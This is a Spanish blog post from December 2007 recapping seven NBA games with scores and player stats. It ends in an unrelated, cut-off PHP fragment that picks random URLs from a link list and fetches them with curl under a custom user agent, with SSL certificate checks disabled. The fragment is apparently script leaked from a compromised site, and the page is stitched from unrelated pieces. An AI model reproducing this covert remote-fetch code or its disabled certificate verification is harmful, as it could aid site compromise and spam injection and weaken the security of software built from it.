La crónica (8/12/07)

09 de December de 2007 por xapa_croack

Tremenda sorpresa la ocurrida este jornada: el peor equipo de la liga, Minnesota Timberwolves, venció a uno de los grandes favoritos al anillo, los Phoenix Suns, en gran parte por culpa de Al Jefferson que jugó posiblemente el mejor partido de su vida. Por otro lado pudimos presenciar un verdadero recital ofensivo en el Utah – Dallas que acabó con victoria de los Mavs, 47 puntos de Josh Howard y 41 de Deron Williams. Además Boston consiguió una victoria que los mantiene como el mejor equipo, New York volvió a dar una pésima impresión y cayó por 28 puntos, los Cavs volvieron a perder y ya van 6 derrotas consecutivas demostrando que sin Lebron no son nada y finalmente los Grizzlies fueron derrotados por los Hawks.

Mucho más datos, en la crónica.

Bobcats 96 – 93 Cavaliers

Los Bobcats se aprovecharon de unos Cavs sin King James para acabar con su racha de 7 derrotas seguidas. La vuelta de Larry Hugues no fue suficiente para ganar a unos Bobcats que cimentaron su victoria en sus particulares 4 fantásticos. Sobre todo en Gerald Wallace (22 puntos, 7rebotes, 4 robos y 5 tapones) y J-Rich (18 puntos y 8 rebotes). Felton y Okafor aportaron 15 y 19 puntos respectivamente. Por parte de los Cavaliers destacaron el ya mencionado Hugues con 22 puntos (aunque mal en el tiro, 6 de 17 FG) y Gibson con 15. El partido se mantuvo igualado durante todo el tiempo y solamente los pequeños detalles dieron finalmente la victoria a los felinos de Charlotte.

Grizzlies 78 – 86 Hawks

Otra derrota más para nuestros ositos… y van 4 seguidas. Un inmenso Josh Smith, ayudado por Joe Jonson y Marvin Williams en ataque y Al Horford en defensa, pudieron con unos tristes Grizzlies en los que sólo ofrecieron verdadera resistencia Rudy Gay y el base Kyle Lowry. Pau sigue sin encontrar su sitio en el esquema de Iavaroni y se quedó en unos discretos 13 puntos y 10 rebotes, mientras que por su parte Juan Carlos Navarro anotó 2 míseros puntos en tan sólo 11 minutos. El partido siempre fue de cara para los Hawks y no tuvieron problemas para administrar la ventaja que obtuvieron en el primer cuarto.

Sixers 105 – 77 Knicks

Otro partido para olvidar en el Madison. El tándem interior de NY (los “enormes” Currys y Zach) que tendrían que ser los puntales de la franquicia se unieron para lograr unos prodigiosos 8 puntos y 4 rebotes. Eso sí, en sólo 31 min. entre los 2. Nate Robinson fue el único que mantuvo la cabeza alta y con 25 ptos se convirtió en el máximo anotador del partido. David Lee con 10 puntos y 11rebotes fue su principal ayuda. Los Sixers no tuvieron problema alguno para dominar cada uno de los cuartos del partido. Un inspirado Willie Green (18ptos) junto a Andre Miller (11ptos – 10 asis) y Iguolada (17 ptos – 9 asist) acabaron con la resistencia de unos endebles Knicks. Los rookies Thadeus Young y Jason Smith tuvieron minutos y cuajaron una buena actuación.

Suns 93 – 100 Timberwolves

El sorpresón de la jornada. La banda, más conocida como los Minnesota Timberwolves, pudo con unos irreconocibles Suns. La clave estuvo en el tremendo partido de Al Jefferson con 32 puntos y 20 rebotes superando en todo momento a Amare Sotudamire. Jaric y Craig Smith siguen en su buena línea, ayudando con buenos números: El serbio hizo 19 puntos y 5 asistencias, y Smith firmó 16 y 8 rebotes. El rookie Corey Brewer sigue demostrando su poder reboteador cogiendo nada menos que 11 rebotes. Por los de Arizona destacaron Steve Nash con 14 puntos y 15 asistencias, Shawn Marion con 18 y 6 rebotes, y Barbosa desde el banco con 17 puntos. La causa de la derrota tal vez fuera el cansancio acumulado por los Phoenix o las temperaturas heladas de Minnesotta, quién sabe, lo que sí podemos asegurar es que quien haya apostado por la victoria de los Wolves se ha podido hacer rico ésta noche. Un brindis por el que lo haya hecho.

Celtics 92 – 81 Bulls

Un partido donde el Big 3 tiene una mala noche se antoja una derrota segura. La pasada noche parecía que la lógica se iba a imponer pero surgió la figura de un Rajon Rondo que sigue madurando como base de los verdes y que ayer se convirtió en la figura del equipo con 18 puntos, 7 rebotes y 5 asistencias en 42 minutos. Ray Allen anotó 21 puntos, KG hizo 16 puntos, 9 rebotes y 7 tapones (más del doble que todo el equipo rival) y Paul Pierce estuvo fatal con un 1 de 8 en tiros de campo aunque repartio 7 asistencias. Otra nota positiva para los verdes fueron los 12 rebotes de su rookie Glen Davis. El partido se mantuvo muy igualado hasta que Boston se distanció en el ultimo cuarto. De los Bulls solo se salvó el argentino Nocioni, que desde el banco aportó 18 tantos mientas que los titulares jugaron un flojo partido.

Jazz 117 – 125 Mavs

Josh Howard y Deron Williams fueron los grandes protagonistas del partido más interesante de la jornada. Los 47 puntos de Howard, récord de su carrera superando en 17 puntos su anterior tope, fueron contrarrestados por los 41 de Williams, tambien récord personal. Los Jazz fueron a remolque todo el partido, aunque a falta de 3 minutos se situaron a 2 puntos. En ese momento apareció la figura de Dirk Nowitzky, apagado en la mayor parte del partido, con un triple decanto definitivamente el choque para los texanos. Josh Howard terminó con los anteriores 47 puntos mencionados (14/17 en tiros) 4 de 5 en triples y solo 2 libres fallados de 17 tirados añadiendo además 10 rebotes. Terry contribuyo con 19 puntos y 5 asistencias y el pívot Erick Dampier acabó con 21 tantos y grandes porcentajes de tiro. Por los Jazz, que pierden su tercer partido consecutivo, los 41 puntos de Deron Williams solo encontraron la ayuda de Carlos Boozer.

Kings 97 – 101 Nuggets

Allen Iverson con 23 puntos 10 asistencias y Kenyon Martin con 20 puntos, 12 rebotes y 5 tapones dieron un trabajado triunfo a los de Colorado. Martin jugó 37 minutos y poco a poco está volviendo a los números de pasadas temporadas. Por su parte el base Anthony Carter sigue beneficiándose de la baja de Chucky Atkins y disputó también 37 minutos, con 17 puntos, 9 asistencias y 3 rebotes. El choque fue dominado de principio a fin por los Nuggets aunque éstos atravesaron un bache en el tercer cuarto que propició que los Kings se volvieran a meter en el partido. Desgraciadamente para Sacramento, sus 24 pérdidas lastraron definitivamente sus posibilidades de victoria y dejaron escapar una buena oportunidad de victoria. Destacaron por los azules John Salmons, que cuajó un gran partido con 25 puntos, 6 rebotes, 3 asistencias y 4 robos, el esloveno Udrih, que volvió a hacer olvidar a Bibby y anotó 24 tantos, y el dominicano Paco Garcia, que desde el banco colaboró con 21 puntos.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>